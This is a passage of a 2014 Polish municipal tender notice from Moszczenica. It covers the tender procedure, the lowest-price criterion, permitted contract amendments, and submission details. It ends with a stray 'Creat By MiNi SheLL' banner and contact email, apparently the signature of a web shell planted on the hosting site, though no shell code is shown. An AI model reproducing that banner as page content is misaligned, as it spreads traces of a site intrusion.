<p>wypełniony formularz ofertowy, oświadczenie z art. 22 ust. 1 ustawy, pisemne zobowiązanie innych podmiotów do udostępnienia wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli w wykazie osób wykonawca wskazał, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, potwierdzoną kserokopię dowodu wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Zamawiający przewiduje zmiany zawartej umowy w przypadku m.in. zaistnienia następujących okoliczości:

a)	zmiany terminu wykonania zamówienia lub terminów płatności będących następstwem zaistnienia siły wyższej, okoliczności, których nie można było przewidzieć przy podpisywaniu Umowy lub zmiany harmonogramu spływu środków finansujących zamówienie   z instytucji finansujących,
b)	 zmiany powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
c)	zmiany w przypadku rezygnacji z części zakresu zamówienia  jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy lub będzie korzystne dla Zamawiającego,
d)	zmiana terminu realizacji przedmiotu umowy spowodowana odmową wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, 
e)	przedłużenie czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia a nie wynikających z przyczyn leżących po stronie Wykonawcy,
f)	zmiana terminu realizacji przedmiotu umowy spowodowana ponad przeciętnymi trudnościami w uzyskaniu niezbędnych pozwoleń na dysponowanie terenami na cele budowlane przez które będzie przechodziła inwestycja, związanymi w szczególności z nieuregulowanym stanem prawnym nieruchomości.
g)	zmiana stawki podatku VAT w trakcie trwania umowy i wynikającej z tego tytułu zmiany wysokości wynagrodzenia  określonego w § 14 ust. 1,
h)	gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży 
w interesie Zamawiającego.
i)	Zmian korzystnych dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.moszczenica.bipst.pl/index.php?grupa=511704<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Moszczenicy, ul. Kosowska 2, 97-310 Moszczenica, Referat Inwestycji i Rozwoju od poniedziałku do piątku, w godz. 8:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2014 godzina 10:00, miejsce: Urząd Gminy w Moszczenicy, ul. Kosowska 1, 97-310 Moszczenica w pok. nr 27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com